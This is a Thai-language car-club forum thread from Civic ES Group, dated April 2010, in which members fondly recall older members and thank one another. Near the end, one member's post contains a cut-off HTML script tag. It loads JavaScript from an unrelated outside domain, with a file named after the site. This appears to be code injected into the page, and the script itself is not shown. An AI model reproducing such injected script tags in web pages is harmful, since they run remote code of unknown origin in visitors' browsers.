ตอบ
YINDEE

ชื่อเล่น: ต๊อด

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1516

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3233
ให้คำขอบคุณ: 3684

ปี: 2001
สี: ม่วง วินเทจพลัม (RP-32P)
จันทร์, 12 เมษา 2010 00:49 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
สวัสดีครับ ชาว ES GROUP ไม่มีอะไรมากครับ แค่ อารมณ์เปลี่ยวๆ เหงาๆ แต่ไม่เศร้านะครับ

ก็ช่วงหลายๆวันที่ผ่านมา ได้เห็นเหตุการณ์ หลายๆอย่างเกิดขึ้นกับ บอร์ดของเรา

เลยมานั่งรำลึกถึง เรื่องราวเก่าๆ ที่เปี่ยมไปด้วย ความ สุข เศร้า เหงา และเซง

หลายเรื่องหลายรสชาติที่ผ่านเข้ามา ก็อดคิดถึง สมาชิกเก่าๆ ที่หายไปนาน นานมาก และ แสนนาน

อย่างเช่น

พี่อ๊อฟ พี่ชายแสนดี อาจจะเป็นคนแรกๆเลย ที่ผมรู้จัก และปรึกษาเรื่องราวต่างๆนานา
ทั้งเรื่อง รถ ของแต่ง และแง่มุมต่างๆในการอยู่ร่วมกันสังคมเวบบอร์ด ของ ES

พี่ใหม่ .. ไม่ต้องบรรยาย..สรรพคุณ ใครไม่รู้ ไม่ใช่ ES เมมเบอร์(เบอร์โทรนะ ... อิอิ )ล้อเล่นนะครับพี่

พี่มอร์ ขาใหญ่ แห่งฝั่งธนฯ เรียกได้ว่า พี่ท่านนี้เปรียบเสมือน จุดศูนย์กลางของES ฝั่งธนฯ เลยก็ว่าได้
ด้วยน้ำใจและไมตรีที่พี่มอร์ มีให้น้องๆนั้นกลับกลายเป็นแรงยึดเหนี่ยวให้กับสมาชิกฝั่งนี้อย่างเหนียวแน่นตลอดมา

หมิงรถเหลือง ... อดีตประธาน รุ่นแรก อัธยาศัยดีมาก ผม เจอหลายครั้งก็หน้าด้านไปทักเค้า โดยที่เค้ายังไม่รู้จักเรา
แต่เค้าก็คุยตอบด้วยมารยาท (แฟนยังถามเลยว่าเค้ารู้จักตัวเองเหรอ?? ไปทักเค้าอ่ะ) 555

เก่งลอดช่อง ขานี้ ไปที่ไหน ฮาที่นั่น เรียกได้ว่า หุ่นที่เพียวบาง บึกบึน ล่ำสัน เป็นที่เตะตา ของสาวๆ ก่อนเพื่อน
ขานี้มักจะเรียกน้ำตาจากเพื่อนๆ ได้เสมอ... (ขำจนน้ำตาไหลนะ)

พี่เล้ง .... นี่ถ้าหัวเข่าพี่เค้าไม่เดี้ยงไปตามสังขาร พี่เค้าคงยังมาเตะบอลกับพวกเราอย่างแน่นอน

ไทเปอร์ หลายคนในนี้อาจจะไม่รู้จักเค้า แต่ทุกวันนี้ เค้าคือ iman อดีตประธาน ของเรานั่นเอง เป็นน้องคนนึงที่น่ารัก
เสียสละทำงานเพื่อพวกเรามาตลอด ตั้งแต่สมัยแรกๆเลย
งานชิ้นแรกที่ผมและเพื่อนๆได้รับมอบหมายให้ช่วยกันทำช่วยกันคนละไม้คนละมือ (ไม่ขอบอกแล้วกันว่างานอะไร)
แม้มันจะมีอุปสรรคอยู่พอสมควร แต่ก็สำเร็จ ได้ด้วยดี ก็เพราะความเสียสละและกำลังใจของเพื่อนๆสมาชิกหลายๆคน
ไม่อย่างนั้น ผม คงไม่มีทางมีวันนี้แน่ๆ

ต่อมา....

อดีตนายก เอ้ย! ประธาน ปลา ขานี้ ที่ทำให้ผมรู้จัก คำว่าเพื่อนใน ES group ตั้งแต่วันแรก
และงานแรกที่ได้รับมอบหมายให้ทำ เค้าเป็นเพื่อนทั้งในบอร์ด แล ะนอกบอร์ด
แถมยังทำให้ผมได้รู้จัก ร้านสุรเดช โชคชัยแอร์ อันเลื่องลือ ....

ALERT เพื่อนคนนี้ ไม่เคยทิ้งกัน ทุกครั้งที่ผมขยับตัวทำอะไรแรงๆ หรือ ห่ามๆ
เพื่อนคนนี้ ถ้าไม่ห้าม (หรือห้ามไม่ได้ก็ไม่รู้นะ) ก็จะไปด้วยกับผมเสมอๆเลย 555

ยังมีสมาชิกอีกหลายคน ที่คิดถึง แต่ไม่ได้เอ่ยชื่อ อาทิ พี่กระต่ายแสนสวย โอ๊ตตี๋หล่อ ลี่หม้อ(เลิฟลี่)
อู๋ว๊อน! samurai_naoto ฯลฯ ผมยังจดจำสิ่งดีๆ และไม่ดี ของเพื่อนและไม่ใช่เพื่อน ทุกคนเสมอมา
เพียงอยากบอกว่า

............................................คิดถึงจัง!..............................................

ปล.สมาชิกท่านใดรักจิงหวังแต่งหนีตามกันมาตั้งแต่บอร์ดแดงคงจำความทรงจำเก่าๆได้นะครับ .... ผมจะได้มีเพื่อน อิอิ

แก้ไขล่าสุดโดย เมื่อ จันทร์, 12 เมษา 2010 01:53, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
carrimoroll

ชื่อเล่น: อาร์ต

เข้าร่วม: 27 กรกฎา 2009
ตอบ: 1978

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6596
ให้คำขอบคุณ: 4103

จันทร์, 12 เมษา 2010 01:11 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
รักพี่ๆ ES มากจังเลย

น่าร๊ากกที่สุ๊ดดด

อยู่ในบ้านหลังนี้มายังไม่ถึงปี แต่เหมือนได้อยู่มามากกว่าเวลาที่อยู่อีกครับ

ครอบครัวนี้อบอุ่นมากๆเลยครับ

ขอบคุณพี่ๆทุกท่านนะครับ ทั้งคำแนะนำ ติชมจากหลายๆท่าน

ได้รับคำขอบคุณจาก: Lee_ES_turbo 
Mor

เข้าร่วม: 07 ตุลา 2008
ตอบ: 189

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 453
ให้คำขอบคุณ: 21
จันทร์, 12 เมษา 2010 05:39 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
โอ้ว มิบังอาจครับ ด้วยความเคารพ ขอบคุณท่านต้นที่ยังคิดถึงกันอยู่ครับท่าน

ผู้ที่ยังอยู่ในใจผมเสมอที่ต้นยังไม่ได้เอ่ยถึง ยังมี

1.อู๋รถขาว ต้นกำเหนิด ES ท่านนี้เป็นตำนาน เค้าทำให้เกิด หางDC2 และ ท่อ MUGEN DC2 และ เค้านี่หละที่ลาก ES มาแต่งคนแรก
2.พี่ศร ผู้อาวุโส ร้อนแรง ดุดัน
3.อ้ายอี๊ด เจ้าของล้อ กามร้าย
4.วิน ผู้ทดลองไปเรื่อยๆ ใครจะรู้ ฉายาของเค้าก็คือ พ่อหนุ่มน้ำมันหอย อยากรู้ถามเจ้าตัวเอาครับ

ยังมีอีกหลายยุคหลายท่าน เดียวมาเล่าใหม่ ไปละ

แก้ไขล่าสุดโดย เมื่อ จันทร์, 12 เมษา 2010 07:42, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: kittidech  YINDEE  battery3k  es94  Lee_ES_turbo  carrimoroll  prodrive 
GuideZ

ตอบ: 837

Guru ES
Guru ES

ได้รับคำขอบคุณ: 776
ให้คำขอบคุณ: 136

จันทร์, 12 เมษา 2010 06:11 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
พี่เตย พี่ลี่ พี่กระต่าย

เอ๋ หรือยางไม่แก่ แต่เก๋าอยู่น๊า
ได้รับคำขอบคุณจาก: YINDEE  Lee_ES_turbo 
Mor

เข้าร่วม: 07 ตุลา 2008
ตอบ: 189

ได้รับคำขอบคุณ: 453
ให้คำขอบคุณ: 21
จันทร์, 12 เมษา 2010 07:41 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
ตาเบิก ผู้ที่ชื่นชอบซีนอลเป็นชีวิตจิตใจ เค้าเป็นคนที่ติดซีนอล คนแรกๆใครที่ผ่านไปอุดมสุข จะเห็นเค้าเปิดไฟหน้าตั้งแต่ 4 โมงเย็น
น้องมุก มันนี่หละเจ้าแม่มูนลูฟ คนแรก แต่ไม่ใช่
เต้94 คนนี้ตะหาก คิงอ๊อฟมูนลูฟ นักสะสมมูนลูฟตัวจิง เค้าทำให้ผมเป็นคนที่ 3 ที่ใส่มูนลูฟ
นัทอิม คนที่ทำให้รู้ว่า อีเอส คู่กับ เอสอี มันเป็นยังไง ตอนนี้ไปอยู่กับ อะเลิท
บักจอนนี่ อีเอสก็ดิฟได้ว่อย ตานี้ เป็นท่านแรก ที่ใส่ราวตากผ้าที่กระโปรงหลัง
อ้ายวา หล่อลากไส้
ตาเจต พ่อครัวใหญ่
ตาไท ไม่รู้กรูเมา
น้องโอม ครับพี่ครับผม
ตาอ้นยัยหน่า คู่รักแสนหวาน คู่รักคู่แรกที่เจอะกันในอีเอส
โบ้ทกะปิ้ว นี่ก็อีกคู่ โครตรักกัน
แฟดนรก เบนกะโบ้ท
เก่งหนิง เดิมๆก็เสียวได้
เอ๋คิดตี้ หมดดูแม่นๆ
อ้นอุทัย ใครว่าผมพูดเหน่อผมคนกุงเทพ
ตี๋เล็ก เอ่อเดียวกูตามปาย
ตาชัย ผู้ก่อตั้ง อีเอส 30 อัพ
ยัยเหมียว ผู้ก่อตั้ง อีเอสแองเจิน
เด่นบัดดี้คลับ ท่านแรกกับ พี1 ขอบ17
อ้ายยู ครับเพ่

ยังมีอีกหลายท่านที่ยังนึกไม่ออก คิดถึงนะ บรรยากาศ ที่ ฟาร์มจรเข้ อุดมสุข
ได้รับคำขอบคุณจาก: PAE KUNG  YINDEE  battery3k  es94  Lee_ES_turbo  carrimoroll 
PAE KUNG

ชื่อเล่น: เป้

เข้าร่วม: 08 ตุลา 2008
ตอบ: 1131

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2818
ให้คำขอบคุณ: 3696

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 12 เมษา 2010 08:04 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
ได้รับคำขอบคุณจาก: YINDEE  Lee_ES_turbo 
RG.KiD

ชื่อเล่น: โอ๊ก

เข้าร่วม: 28 พฤศจิกา 2009
ตอบ: 2214

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4800
ให้คำขอบคุณ: 4461

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 12 เมษา 2010 08:28 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
แหงะ... ยังมะค่อยรู้จักใครเลย.. แม้อายุป๋มจะเยอะ แต่ก็.. มือใหม่ในด้านเรื่องเครื่องยนต์ และการตกแต่ง ES อ่ะค้าบ..
เพิ่งเข้ามาไม่กี่เดือนเอง.. รู้จักบ้าง เป็นบางคน.. Meeting ก็ไปมาแค่ครั้งเดียวเอง.. แต่ก็ได้อะไรจาก ES Group ไปแยะเลย
ได้รู้จักพี่ๆ น้องๆ หลายๆ คนก็.. สุดยอด น่ารัก กันทั้งนั้นครับ..
Rangsit 33

ตอบ: 2276

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3688
ให้คำขอบคุณ: 1582

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 12 เมษา 2010 09:25 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
คิดถึง............................ + ขอบคุณพี่ต้นหลายๆ เรื่องคับ... สำหรับพี่ถ้ามีปัญหาไร..บอกผม (ผมจาเอาไปถามคุงครูให้...555)
Hamster@Yamabuchi

ชื่อเล่น: เบิร์ด

เข้าร่วม: 27 มีนา 2009
ตอบ: 2005

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5433
ให้คำขอบคุณ: 3267

สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 12 เมษา 2010 13:16 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
ผมน้องใหม่คิดถึงพี่ต้นเช่นกันครับ ยังไงพุ่งนี้ไปคลายร้อนกันครับ 55555
ได้รับคำขอบคุณจาก: Lee_ES_turbo  YINDEE 
BOY_PeTiTe

ชื่อเล่น: บอย

ตอบ: 1312

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1696
ให้คำขอบคุณ: 3110

จันทร์, 12 เมษา 2010 13:33 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
ได้รับคำขอบคุณจาก: Lee_ES_turbo  YINDEE 
es94

เข้าร่วม: 03 ตุลา 2008
ตอบ: 660

Guru ES
Guru ES

ได้รับคำขอบคุณ: 332
ให้คำขอบคุณ: 622

จันทร์, 12 เมษา 2010 13:34 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
:)
~ สเตฟาน ~

ชื่อเล่น: สเตฟาน

ตอบ: 2023

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7729
ให้คำขอบคุณ: 4939

สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 12 เมษา 2010 14:18 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
สงสัยลูกคงหลับ เลยมานั่งเป็นตาแก่ขี้เหงาอยู่หน้าคอมฯแน่เลย <script src="https://sport32news.com/civicesgroup.js"></
J.Anusorn

ชื่อเล่น: ไก่

เข้าร่วม: 02 มีนา 2010
ตอบ: 526

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 585
ให้คำขอบคุณ: 1001

ปี: 2003
จันทร์, 12 เมษา 2010 15:01 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
Lee_ES_turbo

เข้าร่วม: 02 ตุลา 2008
ตอบ: 4446

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8088
ให้คำขอบคุณ: 5249

ปี: 2004
จันทร์, 12 เมษา 2010 17:08 - กระทู้ "คนแก่" รึเปล่าไม่รู้...???
อารมณ์ไหนเนี่ย พี่ต้น ทำอย่างกะจะสั่งลาน้องๆเลย ชิ ผมไม่ให้พี่ไปหรอก ยังไงพี่ต้นก่อยังเป็นพี่ต้นวันยังค่ำ 5555 (คนล่ะเรื่องนิ)

คิดถึงพี่ๆหลายๆคนด้วยเช่นกันคับ ถึงไม่รู้จักไม่หมดตามที่พี่ต้นกล่าวมาก่อตาม ขอให้บ้านนี้มีแต่ความสงบสุขด้วยคร๊าบบบ

จากเด็กน้อยตาดำๆ ที่มีใจรักใน CIVIC ES GROUP คับผม
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  PAE KUNG  J.Anusorn  YINDEE 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.